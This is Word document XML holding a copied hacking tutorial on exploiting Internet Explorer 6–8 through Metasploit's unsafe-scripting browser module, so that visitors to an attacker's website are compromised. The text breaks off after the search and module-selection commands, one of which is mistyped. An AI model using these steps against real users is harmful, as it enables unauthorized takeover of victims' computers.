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57B" w:rsidRPr="005C057B" w:rsidRDefault="005C057B" w:rsidP="000A326C">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r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://null-byte.wonderhowto.com/how-to/hack-like-pro-exploit-ie8-get-root-access-when-people-visit-your-website-0139617/" </w:instrText>
      </w:r>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">How to Exploit IE8 to Get Root Access When People Visit Your Website </w:t>
      </w:r>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C057B" w:rsidRPr="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">All of </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="005C057B">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>my hacks</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> up to this point have been operating system hacks. In other words, we have exploited a vulnerability usually in an operating system service (</w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="005C057B">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>SMB</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="005C057B">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>RPC</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, etc.) that all allow us to install a command shell or other code in the target system.</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="005C057B" w:rsidRPr="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">As I have mentioned </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="005C057B">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>numerous times</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> previously, the art of hacking is presently focused on attacking the client side rather than the server side. Server operating systems have become more secure, while clients are loaded with insecure software that can be easily exploited. So, as you would expect, the best hacks are now coming at the client side software.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C057B" w:rsidRPr="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Now, I will begin to explore ways to hack the client side of the equation. Just as a background note, nearly all of these hacks I have shown you so far are buffer overflows. In other words, we find a variable in the system software that can be overflowed with too much information and jam our software behind it (kind of oversimplified, but you get the idea, I hope).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C057B" w:rsidRPr="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Hacking IE8 for Root Access</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C057B" w:rsidRPr="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In this hack, we will exploit Microsoft's Internet Explorer 6, 7, and 8 on Windows XP, Vista, Windows 7 or Windows Server 2003 and 2008.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C057B" w:rsidRPr="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>When Windows 7 and Windows Server 2008 were released, the default browser was IE8, so unless the target has upgraded their browser, this vulnerable browser is still on their system and we can hack it. In our example, we will use IE 8 on Windows Vista, but it will work on any of the operating systems listed above with Internet Explorer 8.1 or earlier on it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C057B" w:rsidRPr="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">So, let's get started. Fire up your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="005C057B">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">click here for an intro to </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="005C057B">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Metasploit</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) on Back Track 5 and let's get cooking!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005C057B" w:rsidRPr="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 1Find the Appropriate Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C057B" w:rsidRPr="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's find the appropriate exploit by searching </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for a Windows exploit that takes advantage of unsafe scripting. Type:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C057B" w:rsidRPr="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>type:exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>platform:windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> unsafe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C057B" w:rsidRPr="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">As you can see from the screenshot below, this search brought 15 exploits. The one we want is </w:t>
      </w:r>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/exploit/windows/browser/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ie_unsafe_scripting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C057B" w:rsidRPr="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6016752" cy="5294376"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1905"/>
            <wp:docPr id="3" name="Picture 3" descr="https://img.wonderhowto.com/img/87/99/63485307608993/0/hack-like-pro-exploit-ie8-get-root-access-when-people-visit-your-website.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87/99/63485307608993/0/hack-like-pro-exploit-ie8-get-root-access-when-people-visit-your-website.w1456.jp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6752" cy="5294376"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C057B" w:rsidRPr="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Step 2 Select This Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C057B" w:rsidRPr="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Next tell </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> that this is the exploit we want to use. Type:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C057B" w:rsidRPr="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt; use /exploit/windows/browser/i.e._</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>unsafe_scripting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
